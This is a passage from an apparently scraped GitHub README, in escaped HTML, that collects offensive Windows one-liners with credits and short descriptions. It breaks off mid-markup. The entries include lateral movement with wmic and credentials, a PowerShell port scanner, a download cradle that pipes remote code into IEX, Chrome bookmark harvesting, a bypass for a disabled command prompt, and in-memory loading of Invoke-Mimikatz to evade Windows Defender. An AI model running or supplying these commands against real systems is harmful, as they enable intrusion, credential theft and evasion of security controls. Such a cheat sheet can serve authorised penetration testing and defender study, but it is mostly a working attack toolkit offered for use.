href=\"#enable-multiple-rdp-sessions-per-user\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"reg add HKLM\\System\\CurrentControlSet\\Control\\TerminalServer /v fSingleSessionPerUser /d 0 /f\"\u003e\u003cpre\u003ereg add HKLM\u003cspan class=\"pl-cce\"\u003e\\S\u003c/span\u003eystem\u003cspan class=\"pl-cce\"\u003e\\C\u003c/span\u003eurrentControlSet\u003cspan class=\"pl-cce\"\u003e\\C\u003c/span\u003eontrol\u003cspan class=\"pl-cce\"\u003e\\T\u003c/span\u003eerminalServer /v fSingleSessionPerUser /d 0 /f\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Sometimes you want to log in to a host via RDP or similar, but your user has an active session. Enable multiple sessions per user.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1609954528425558016\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eSysinternals PsExec.exe local alternative\u003c/h3\u003e\u003ca id=\"user-content-sysinternals-psexecexe-local-alternative\" class=\"anchor\" aria-label=\"Permalink: 🔙Sysinternals PsExec.exe local alternative\" href=\"#sysinternals-psexecexe-local-alternative\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"wmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c \u0026quot; command \u0026quot;\"\u003e\u003cpre\u003ewmic.exe /node:10.1.1.1 /user:username /password:pass process call create cmd.exe /c \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e command \u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Are you tired of uploading Sysinternals PsExec.exe when doing lateral movement? Windows has a better alternative preinstalled. Try this instead.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/GuhnooPlusLinux\" rel=\"nofollow\"\u003e@GuhnooPlusLinux\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/GuhnooPlusLinux/status/1607473627922063360\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eLive off the land port scanner\u003c/h3\u003e\u003ca id=\"user-content-live-off-the-land-port-scanner\" class=\"anchor\" aria-label=\"Permalink: 🔙Live off the land port scanner\" href=\"#live-off-the-land-port-scanner\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"0..65535 | % {echo ((new-object Net.Sockets.TcpClient).Connect(\u0026lt;tgt_ip\u0026gt;,$_)) \u0026quot;Port $_ open\u0026quot;} 2\u0026gt;$null\"\u003e\u003cpre\u003e0..65535 \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e % {echo \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e((\u003c/span\u003enew\u003cspan class=\"pl-k\"\u003e-\u003c/span\u003eobject Net.Sockets.TcpClient).Connect(\u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003etgt_ip\u003cspan class=\"pl-k\"\u003e\u0026gt;,\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e\u003cspan class=\"pl-pds\"\u003e))\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ePort \u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e open\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e} \u003cspan class=\"pl-k\"\u003e2\u0026gt;\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$null\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'When possible, live off the land rather than uploading tools to machines (for many reasons). PowerShell/.NET help. Ex: simple port scanner in Powershell.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1605060950339588096\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eProxy aware PowerShell DownloadString\u003c/h3\u003e\u003ca id=\"user-content-proxy-aware-powershell-downloadstring\" class=\"anchor\" aria-label=\"Permalink: 🔙Proxy aware PowerShell DownloadString\" href=\"#proxy-aware-powershell-downloadstring\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"$w=(New-Object Net.WebClient);$w.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;IEX $w.DownloadString(\u0026quot;\u0026lt;url\u0026gt;\u0026quot;)\"\u003e\u003cpre\u003e\u003cspan class=\"pl-smi\"\u003e$w\u003c/span\u003e=(New-Object Net.WebClient)\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-smi\"\u003e$w\u003c/span\u003e.Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003eIEX \u003cspan class=\"pl-smi\"\u003e$w\u003c/span\u003e.DownloadString(\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u0026lt;url\u0026gt;\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e)\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Most large orgs are using web proxies these days. The standard PowerShell download cradle is not proxy aware. Use this one.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1596192664398966785\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eLooking for internal endpoints in browser bookmarks\u003c/h3\u003e\u003ca id=\"user-content-looking-for-internal-endpoints-in-browser-bookmarks\" class=\"anchor\" aria-label=\"Permalink: 🔙Looking for internal endpoints in browser bookmarks\" href=\"#looking-for-internal-endpoints-in-browser-bookmarks\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"type \u0026quot;C:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks.bak\u0026quot; | findstr /c \u0026quot;name url\u0026quot; | findstr /v \u0026quot;type\u0026quot;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c1\"\u003etype\u003c/span\u003e \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Users\\%USERNAME%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks.bak\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e findstr /c \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ename url\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e findstr /v \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003etype\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'You'd be surprised what you can find out from a user's bookmarks alone. Internal endpoints they can access, for instance.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1595488676389171200\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eQuery DNS records for enumeration\u003c/h3\u003e\u003ca id=\"user-content-query-dns-records-for-enumeration\" class=\"anchor\" aria-label=\"Permalink: 🔙Query DNS records for enumeration\" href=\"#query-dns-records-for-enumeration\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Get-DnsRecord -RecordType A -ZoneName FQDN -Server \u0026lt;server hostname\u0026gt;\"\u003e\u003cpre\u003eGet-DnsRecord -RecordType A -ZoneName FQDN -Server \u003cspan class=\"pl-k\"\u003e\u0026lt;\u003c/span\u003eserver hostname\u003cspan class=\"pl-k\"\u003e\u0026gt;\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Enumeration is 95% of the game. However, launching tons of scans to evaluate the environment is very loud. Why not just ask the DC/DNS server for all DNS records?'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1587132627823181824\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eUnquoted service paths without PowerUp\u003c/h3\u003e\u003ca id=\"user-content-unquoted-service-paths-without-powerup\" class=\"anchor\" aria-label=\"Permalink: 🔙Unquoted service paths without PowerUp\" href=\"#unquoted-service-paths-without-powerup\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"Get-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq \u0026quot;Auto\u0026quot; -and $_.PathName -notlike \u0026quot;C:\\Windows*\u0026quot; -and $_.PathName -notlike '\u0026quot;*'} | select PathName,DisplayName,Name\"\u003e\u003cpre\u003eGet-CIMInstance -class Win32_Service -Property Name, DisplayName, PathName, StartMode \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e Where {\u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e.StartMode -eq \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eAuto\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -and \u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e.PathName -notlike \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003eC:\\Windows*\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e -and \u003cspan class=\"pl-smi\"\u003e$_\u003c/span\u003e.PathName -notlike \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\"*\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e} \u003cspan class=\"pl-k\"\u003e|\u003c/span\u003e \u003cspan class=\"pl-k\"\u003eselect\u003c/span\u003e \u003cspan class=\"pl-smi\"\u003ePathName,DisplayName,Name\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Finding unquoted service paths without PowerUp'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d\" rel=\"nofollow\"\u003e@Alh4zr3d\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/Alh4zr3d/status/1579254955554136064\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eBypass a disabled command prompt with /k\u003c/h3\u003e\u003ca id=\"user-content-bypass-a-disabled-command-prompt-with-k\" class=\"anchor\" aria-label=\"Permalink: 🔙Bypass a disabled command prompt with /k\" href=\"#bypass-a-disabled-command-prompt-with-k\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Win+R (To bring up Run Box)\ncmd.exe /k \u0026quot;whoami\u0026quot;\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Win+R (To bring up Run Box)\u003c/span\u003e\ncmd.exe /k \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003ewhoami\u003cspan class=\"pl-pds\"\u003e\"\u003c/span\u003e\u003c/span\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'This command prompt has been disabled by your administrator...' Can usually be seen in environments such as kiosks PCs, a quick hacky work around is to use /k via the windows run box. This will carry out the command and then show the restriction message, allowing for command execution.\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e Martin Sohn Christensen\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://improsec.com/tech-blog/the-command-prompt-has-been-disabled-by-your-administrator-press-any-key-to-continue-or-use-these-weird-tricks-to-bypass-admins-will-hate-you\" rel=\"nofollow\"\u003eBlog\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eStop windows defender deleting mimikatz.exe\u003c/h3\u003e\u003ca id=\"user-content-stop-windows-defender-deleting-mimikatzexe\" class=\"anchor\" aria-label=\"Permalink: 🔙Stop windows defender deleting mimikatz.exe\" href=\"#stop-windows-defender-deleting-mimikatzexe\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"(new-object net.webclient).downloadstring('https://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1')|IEX;inv\"\u003e\u003cpre\u003e(new-object net.webclient).downloadstring(\u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003ehttps://raw.githubusercontent[.]com/BC-SECURITY/Empire/main/empire/server/data/module_source/credentials/Invoke-Mimikatz.ps1\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e)\u003cspan class=\"pl-k\"\u003e|\u003c/span\u003eIEX\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003einv\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eDescription:\u003c/strong\u003e \u003cem\u003e'Are you tired of Windows Defender deleting mimikatz.exe? Try this instead.'\u003c/em\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eCredit:\u003c/strong\u003e \u003ca href=\"https://twitter.com/GuhnooPlusLinux\" rel=\"nofollow\"\u003e@GuhnooPlusLinux\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eLink:\u003c/strong\u003e \u003ca href=\"https://twitter.com/GuhnooPlusLinux/status/1605629049660809216\" rel=\"nofollow\"\u003eTwitter\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003eCheck if you are in a virtual machine\u003c/h3\u003e\u003ca id=\"user-content-check-if-you-are-in-a-virtual-machine\" class=\"anchor\" aria-label=\"Permalink: 🔙Check if you are in a virtual machine\" href=\"#check-if-you-are-in-a-virtual-machine\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 